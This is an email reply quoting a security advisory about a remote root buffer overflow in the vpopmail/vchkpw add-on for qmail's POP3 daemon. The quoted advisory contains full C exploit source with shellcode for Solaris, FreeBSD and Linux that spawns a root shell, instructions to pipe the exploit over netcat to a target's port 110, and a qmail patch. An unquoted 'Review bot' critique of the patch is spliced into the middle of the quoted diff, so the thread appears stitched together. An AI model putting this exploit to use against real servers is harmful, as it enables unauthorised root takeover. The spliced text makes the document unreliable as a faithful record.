The exploitable code has been fixed since Jan 20th. 

Ken Jones

Irwan Hadi wrote:
> 
> What do you think ?
> 
>           Vpopmail (qmail add-on) is vulnerable to remote root exploit
> (vpopmail, vchkpw)
> ----------------------------------------------------------------------------
> ----
> 
> SUMMARY
> 
> When the vpopmail qmail add-on is installed and used to authenticate user
> information, a remote attacker may compromise the machine by supplying a
> long argument to qmail (which passes it to vpopmail). A remote attacker
> may obtain the privilege level of the authentication module - usually
> root.
> 
> DETAILS
> 
> Qmail-pop3d assumes that its password-check mechanism will support the
> long password that is passed to it. While according to RFC 1939 (Post
> Office Protocol version 3) POP-3 passwords should be no longer than 40
> characters, qmail supports longer passwords, and therefore it is possible
> to pass vpopmail (a specific password-verification mechanism) a password
> longer than it expects, causing a buffer overflow.
> 
> Exploit:
> /*
>    qmail-qpop3d-vchkpw.c (v.3)
>    by: K2,
> 
>    The inter7 supported vchkpw/vpopmail package (replacement for
> chkeckpasswd)
>    has big problems ;)
> 
>    gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
>    ( ./vpop [offset] [alignment] ; cat ) | nc target.com 110
> 
>    play with the alignment to get it to A) crash B) work.
>    qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for
> now.
>    Tested agenst: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE
>    vpopmail-3.4.10a/vpopmail-3.4.11[b-e]
> 
>    Hi plaguez.
>    prop's to Interrupt for testing with bsd, _eixon an others ;)
>    cheez shell's :)
>    THX goes out to STARBUCKS*!($#!
> */
> 
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> 
> #define SIZE   260
> #define NOP    0x90
> #ifdef SX86
> #define DEFOFF 0x8047cfc
> #define NOPDEF 75
> #elif BSD
> #define DEFOFF 0xbfbfdbbf
> #define NOPDEF 81
> #else
> #define DEFOFF 0xbffffcd8
> #define NOPDEF 81
> #endif
> 
> char *shell =
> #ifdef SX86 // Solaris IA32 shellcode, cheez
> "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
> "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
> "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
> "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
> "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
> "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
> #elif BSD // fBSD shellcode, [EMAIL PROTECTED]
> 
> "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
> "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
> "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
> "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
> #else // Linux shellcode, no idea
> "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
> "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
> "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
> "\xff\xff/bin/sh\xff";
> #endif
> 
> int main(int argc, char **argv)
> {
>    int i=0,esp=0,offset=0,nop=NOPDEF;
>    char buffer[SIZE];
> 
>    if (argc > 1) offset += strtol(argv[1], NULL, 0);
>    if (argc > 2) nop += strtol(argv[2], NULL, 0);
> 
>    esp = DEFOFF;
> 
>    memset(buffer, NOP, SIZE);
>    memcpy(buffer+nop, shell, strlen(shell));
>    for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
>       *((int *) &buffer[i]) = esp+offset;
>    }
> 
>    printf("user %s\n",buffer);
>    printf("pass ADMR0X&*!(#&*(!\n");
> 
>    fprintf(stderr,"\nbuflen = %d, nops = %d, target =
> 0x%x\n\n",strlen(buffer),nop,esp+offset);
>    return(0);
> }
> 
> Patch:
> --- qmail-1.03/qmail-popup.c    Mon Jun 15 03:53:16 1998
> +++ qmail-1.03-patch/qmail-popup.c      Fri Jan 21 13:00:18 2000
> @@ -13,6 +13,8 @@
>  #include "readwrite.h"
>  #include "timeoutread.h"
>  #include "timeoutwrite.h"
> +#include <unistd.h>
> +#include <syslog.h>
> 
>  void die() { _exit(1); }
> 
> @@ -87,6 +89,24 @@
>    int child;
>    int wstat;
>    int pi[2];
> +
> +  /*
> +    This patch should have minimal impact of normal qmail operations.
> +    It was coded/tested under linux, but should work most everywhere.
> +  */
> +
> +  if(strlen(user) >= 40)
> +  {
> +     syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(user));
> +     user[39]='\0';
> +     userlen=strlen(user);
> +  }
> +
> +  if(strlen(pass) >= 40)
> +  {
> +     syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(pass));
> +     pass[39]='\0';
> +  }
> 
>    if (fd_copy(2,1) == -1) die_pipe();
>    close(3);
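Review bot: Truncating an over-long `user` or `pass` to 39 bytes and carrying on (`user[39]='\0'`, `pass[39]='\0'`) silently rewrites the credential rather than refusing it, so an over-length value is checked as a different string than the client sent; logging and then rejecting is the safer response, e.g. `if (strlen(user) >= 40) { syslog(LOG_NOTICE,"excessive argument length [%lu]",(unsigned long)strlen(user)); die(); }` and the same for `pass`, using the `die()` already defined in this file. Both `syslog` calls pass the `strlen` result to a `%d` conversion, which is a type mismatch; the `(unsigned long)` cast with `%lu` above fixes that too. `userlen` is resynchronised after `user` is cut, but nothing equivalent is shown for `pass`, so if the caller tracks a length for it that value stays stale, and the `>= 40` test also cuts an exactly-40-character value that the RFC limit quoted in the advisory would allow, which may or may not matter depending on the checker's buffer size. The enclosing function begins before this hunk; this bound is a qmail-side workaround, and the overflow the advisory describes is in the vchkpw/vpopmail checker that receives these strings, so that component still needs its own fix.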
> 
> ADDITIONAL INFORMATION
> 
> No solution is currently available.
> 
> The information was provided by:  <mailto:[EMAIL PROTECTED]> K2.
> 
> ========================================
> 
> -------
> AFLHI 058009990407128029/089802---(102598//991024)
